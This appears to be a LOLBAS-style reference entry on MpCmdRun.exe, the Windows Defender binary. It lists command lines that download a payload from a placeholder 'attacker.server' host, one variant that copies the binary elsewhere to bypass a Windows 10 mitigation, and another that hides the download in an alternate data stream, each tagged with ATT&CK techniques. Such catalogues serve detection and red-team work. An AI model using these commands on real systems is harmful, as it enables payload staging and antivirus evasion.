.. /MpCmdRun.exe

Star

Binary part of Windows Defender. Used to manage settings in Windows Defender

• https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus
• https://twitter.com/mohammadaskar2/status/1301263551638761477
• https://twitter.com/Oddvarmoe/status/1301444858910052352
• https://twitter.com/NotMedic/status/1301506813242867720

Download

1. Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)

   MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe

   Use case

   Download file

   Privileges required

   User

   Operating systems

   Windows 10

   ATT&CK® technique

   T1105

2. Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]

   copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe

   Use case

   Download file

   Privileges required

   User

   Operating systems

   Windows 10

   ATT&CK® technique

   T1105

Alternate data streams

1. Download file to machine and store it in Alternate Data Stream

   MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\temp\nicefile.txt:evil.exe

   Use case

   Hide downloaded data inton an Alternate Data Stream

   Privileges required

   User

   Operating systems

   Windows 10

   ATT&CK® technique

   T1564.004